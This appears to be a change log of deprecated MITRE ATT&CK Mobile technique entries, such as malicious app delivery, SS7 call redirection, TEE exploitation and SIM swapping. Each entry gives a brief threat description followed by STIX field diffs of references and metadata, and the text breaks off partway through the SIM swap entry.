Description: Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices. App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses: * [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407) * [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406) Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang) Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer) Adversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesJon Oberheide and Charlie Miller. (2012). Dissecting the Android Bouncer. Retrieved December 12, 2016.
external_referencesJon Oberheide. (2010, June 25). Remote Kill and Install on Google Android. Retrieved December 12, 2016.
external_referencesNicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved December 12, 2016.
external_referencesRadhesh Krishnan Konoth, Victor van der Veen, and Herbert Bos. (n.d.). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved December 12, 2016.
external_referencesThanasis Petsas, Giannis Voyatzis, Elias Athanasopoulos, Michalis Polychronakis, Sotiris Ioannidis. (2014, April). Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware. Retrieved December 12, 2016.
external_referencesTielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013, August). Jekyll on iOS: When Benign Apps Become Evil. Retrieved December 9, 2016.
external_referencesECO-4
external_referencesECO-16
external_referencesECO-17
external_referencesAPP-20
external_referencesAPP-21
external_referencesECO-22
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1078
external_referencesECO-4
external_referencesECO-16
external_referencesECO-17
external_referencesAPP-20
external_referencesAPP-21
external_referencesECO-22
external_referencesThanasis Petsas, Giannis Voyatzis, Elias Athanasopoulos, Michalis Polychronakis, Sotiris Ioannidis. (2014, April). Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware. Retrieved December 12, 2016.
external_referencesJon Oberheide and Charlie Miller. (2012). Dissecting the Android Bouncer. Retrieved December 12, 2016.
external_referencesNicholas J. Percoco and Sean Schulte. (2012). Adventures in BouncerLand. Retrieved December 12, 2016.
external_referencesTielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013, August). Jekyll on iOS: When Benign Apps Become Evil. Retrieved December 9, 2016.
external_referencesJon Oberheide. (2010, June 25). Remote Kill and Install on Google Android. Retrieved December 12, 2016.
external_referencesRadhesh Krishnan Konoth, Victor van der Veen, and Herbert Bos. (n.d.). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved December 12, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-10-14 17:42:49.817000+00:002022-04-06 15:41:33.827000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueOberheide-Bouncer
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.htmlhttps://jon.oberheide.org/files/summercon12-bouncer.pdf
external_references[2]['source_name']NIST Mobile Threat CatalogueOberheide-RemoteInstall
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.htmlhttps://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/
external_references[3]['source_name']NIST Mobile Threat CataloguePercoco-Bouncer
external_references[3]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.htmlhttps://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf
external_references[4]['source_name']NIST Mobile Threat CatalogueKonoth
external_references[4]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.htmlhttp://www.vvdveen.com/publications/BAndroid.pdf
external_references[5]['source_name']NIST Mobile Threat CataloguePetsas
external_references[5]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.htmlhttp://dl.acm.org/citation.cfm?id=2592796
external_references[6]['source_name']NIST Mobile Threat CatalogueWang
external_references[6]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.htmlhttps://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei
external_references[7]['source_name']PetsasNIST Mobile Threat Catalogue
external_references[7]['url']http://dl.acm.org/citation.cfm?id=2592796https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html
external_references[8]['source_name']Oberheide-BouncerNIST Mobile Threat Catalogue
external_references[8]['url']https://jon.oberheide.org/files/summercon12-bouncer.pdfhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html
external_references[9]['source_name']Percoco-BouncerNIST Mobile Threat Catalogue
external_references[9]['url']https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdfhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html
external_references[10]['source_name']WangNIST Mobile Threat Catalogue
external_references[10]['url']https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tieleihttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html
external_references[11]['source_name']Oberheide-RemoteInstallNIST Mobile Threat Catalogue
external_references[11]['url']https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html
external_references[12]['source_name']KonothNIST Mobile Threat Catalogue
external_references[12]['url']http://www.vvdveen.com/publications/BAndroid.pdfhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html

[T1476] Deliver Malicious App via Other Means

Current version: 1.2

Description: Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working. Delivery methods for the malicious application include: * [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) - Including the mobile app package as an attachment to an email message. * [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means. * Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird) Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesA Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018.
external_referencesJordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018.
external_referencesLukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.
external_referencesAUT-9
external_referencesECO-13
external_referencesECO-21
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1079
external_referencesAUT-9
external_referencesECO-13
external_referencesECO-21
external_referencesJordan Pan. (2016, February 10). User Beware: Rooting Malware Found in 3rd Party App Stores. Retrieved November 8, 2018.
external_referencesVeo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018.
external_referencesLukáš Štefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 14:28:47.076000+00:002022-04-06 15:41:16.863000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueIBTimes-ThirdParty
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.htmlhttps://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861
external_references[2]['source_name']NIST Mobile Threat CatalogueTrendMicro-RootingMalware
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.htmlhttps://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/
external_references[3]['source_name']NIST Mobile Threat Catalogueandroid-trojan-steals-paypal-2fa
external_references[3]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.htmlhttps://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/
external_references[4]['source_name']IBTimes-ThirdPartyTrendMicro-FlappyBird
external_references[4]['description']A Prasad. (2016, February 19). Danger lurks in third-party Android app stores. Retrieved November 8, 2018.Veo Zhang. (2014, February 18). Flappy Bird and Third-Party App Stores. Retrieved November 8, 2018.
external_references[4]['url']https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/
external_references[5]['source_name']TrendMicro-RootingMalwareNIST Mobile Threat Catalogue
external_references[5]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html
external_references[6]['source_name']TrendMicro-FlappyBirdNIST Mobile Threat Catalogue
external_references[6]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html
external_references[7]['source_name']android-trojan-steals-paypal-2faNIST Mobile Threat Catalogue
external_references[7]['url']https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html

[T1449] Exploit SS7 to Redirect Phone Calls/SMS

Current version: 1.2

Description: An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.
external_referencesCEL-37
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1052
external_referencesCEL-37
external_referencesIain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-07-28 18:43:50.490000+00:002022-04-06 15:53:27.032000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat Catalogue3GPP-Security
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.htmlhttp://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf
external_references[2]['source_name']Engel-SS7CSRIC5-WG10-FinalReport
external_references[2]['description']Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.
external_references[2]['url']https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdfhttps://www.fcc.gov/files/csric5-wg10-finalreport031517pdf
external_references[3]['source_name']Engel-SS7-2008TheRegister-SS7
external_references[3]['description']Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.Iain Thomson. (2017, May 3). After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts. Retrieved November 8, 2018.
external_references[3]['url']https://www.youtube.com/watch?v=q0n5ySqbfdIhttps://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/
external_references[4]['source_name']3GPP-SecurityPositive-SS7
external_references[4]['description']3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.
external_references[4]['url']http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdfhttps://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf
external_references[5]['source_name']Positive-SS7Engel-SS7-2008
external_references[5]['description']Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.
external_references[5]['url']https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdfhttps://www.youtube.com/watch?v=q0n5ySqbfdI
external_references[6]['source_name']CSRIC5-WG10-FinalReportEngel-SS7
external_references[6]['description']Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.
external_references[6]['url']https://www.fcc.gov/files/csric5-wg10-finalreport031517pdfhttps://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf
external_references[7]['source_name']TheRegister-SS7NIST Mobile Threat Catalogue
external_references[7]['url']https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html

[T1405] Exploit TEE Vulnerability

Current version: 1.0

Description: A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesJan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016.
external_referencesAPP-27
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1008
external_referencesAPP-27
external_referenceslaginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 15:41:57.666000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueEkbergTEE
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.htmlhttps://usmile.at/symposium/program/2015/ekberg
external_references[4]['source_name']EkbergTEElaginimaineb-TEE
external_references[4]['description']Jan-Erik Ekberg. (2015, September 10). Android and trusted execution environments. Retrieved December 9, 2016.laginimaineb. (2016, May). War of the Worlds - Hijacking the Linux Kernel from QSEE. Retrieved December 21, 2016.
external_references[4]['url']https://usmile.at/symposium/program/2015/ekberghttp://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html
external_references[5]['source_name']laginimaineb-TEENIST Mobile Threat Catalogue
external_references[5]['url']http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

[T1477] Exploit via Radio Interfaces

Current version: 1.1

Description: The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces. ### Baseband Vulnerability Exploitation A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband). ### Malicious SMS Message An SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1080
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:19:22.439000+00:002022-04-06 15:42:13.444000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']ProjectZero-BroadcomWiFiForbes-iPhoneSMS
external_references[1]['description']Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018.Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016.
external_references[1]['url']https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.htmlhttp://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html
external_references[3]['source_name']Weinmann-BasebandProjectZero-BroadcomWiFi
external_references[3]['description']R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016.Gal Beniamini. (2017, April 4). Over The Air: Exploiting Broadcom's Wi-Fi Stack. Retrieved November 8, 2018.
external_references[3]['url']https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdfhttps://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html
external_references[4]['source_name']Forbes-iPhoneSMSWeinmann-Baseband
external_references[4]['description']Andy Greenberg. (2009, July 28). How to Hijack 'Every iPhone In The World'. Retrieved December 23, 2016.R. Weinmann. (2012, August 6-7). Baseband Attacks: Remote Exploitation of Memory Corruptions in Cellular Protocol Stacks. Retrieved December 23, 2016.
external_references[4]['url']http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.htmlhttps://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf

[T1444] Masquerade as Legitimate Application

Current version: 2.1

Description: An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application. Embedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method. Pretending to be a legitimate application relies heavily on lack of scrutinization by the user. Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox) Malicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesA. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.
external_referencesYajin Zhou and Xuxian Jiang. (2012, May). Dissecting Android Malware: Characterization and Evolution. Retrieved December 9, 2016.
external_referencesAPP-31
external_referencesAPP-14
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1047
external_referencesAPP-31
external_referencesAPP-14
external_referencesYajin Zhou and Xuxian Jiang. (2012, May). Dissecting Android Malware: Characterization and Evolution. Retrieved December 9, 2016.
external_referencesA. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.
values_changed
STIX FieldOld valueNew Value
modified2020-04-08 15:19:56.147000+00:002022-04-06 15:45:52.558000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CataloguePalo Alto HenBox
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.htmlhttps://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/
external_references[2]['source_name']NIST Mobile Threat CatalogueZhou
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.htmlhttp://ieeexplore.ieee.org/document/6234407
external_references[3]['source_name']ZhouNIST Mobile Threat Catalogue
external_references[3]['url']http://ieeexplore.ieee.org/document/6234407https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html
external_references[4]['source_name']Palo Alto HenBoxNIST Mobile Threat Catalogue
external_references[4]['url']https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-14.html

[T1403] Modify Cached Executable Code

Current version: 1.1

Description: ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1006
values_changed
STIX FieldOld valueNew Value
modified2019-10-09 19:39:32.872000+00:002022-04-06 15:46:29.338000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1399] Modify Trusted Execution Environment

Current version: 1.1

Description: If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device's Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.(Citation: Roth-Rootkits)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesApple. (2016, May). iOS Security. Retrieved December 21, 2016.
external_referencesAPP-27
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1002
external_referencesAPP-27
external_referencesApple. (2016, May). iOS Security. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:23:10.576000+00:002022-04-06 15:48:41.647000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueApple-iOSSecurityGuide
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.htmlhttps://www.apple.com/business/docs/iOS_Security_Guide.pdf
external_references[3]['source_name']Apple-iOSSecurityGuideNIST Mobile Threat Catalogue
external_references[3]['url']https://www.apple.com/business/docs/iOS_Security_Guide.pdfhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

[T1470] Obtain Device Cloud Backups

Current version: 1.0

Description: An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesElcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016.
external_referencesOleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018.
external_referencesECO-0
external_referencesECO-1
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1073
external_referencesECO-0
external_referencesECO-1
external_referencesElcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016.
external_referencesOleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 15:54:11.189000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueElcomsoft-EPPB
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.htmlhttps://www.elcomsoft.com/eppb.html
external_references[2]['source_name']NIST Mobile Threat CatalogueElcomsoft-WhatsApp
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.htmlhttps://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/
external_references[3]['source_name']Elcomsoft-EPPBNIST Mobile Threat Catalogue
external_references[3]['url']https://www.elcomsoft.com/eppb.htmlhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html
external_references[4]['source_name']Elcomsoft-WhatsAppNIST Mobile Threat Catalogue
external_references[4]['url']https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html

[T1469] Remotely Wipe Data Without Authorization

Current version: 1.0

Description: An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesMat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016.
external_referencesEMM-7
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1072
external_referencesECO-5
external_referencesMat Honan. (2012, August 6). How Apple and Amazon Security Flaws Led to My Epic Hacking. Retrieved December 29, 2016.
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 15:54:28.187000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueHonan-Hacking
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.htmlhttps://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.htmlhttps://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html
external_references[2]['external_id']EMM-7ECO-5
external_references[3]['source_name']Honan-HackingNIST Mobile Threat Catalogue
external_references[3]['url']https://www.wired.com/2012/08/apple-amazon-mat-honan-hacking/https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

[T1451] SIM Card Swap

Current version: 1.2

Description: An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap) One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)

Details
dictionary_item_added
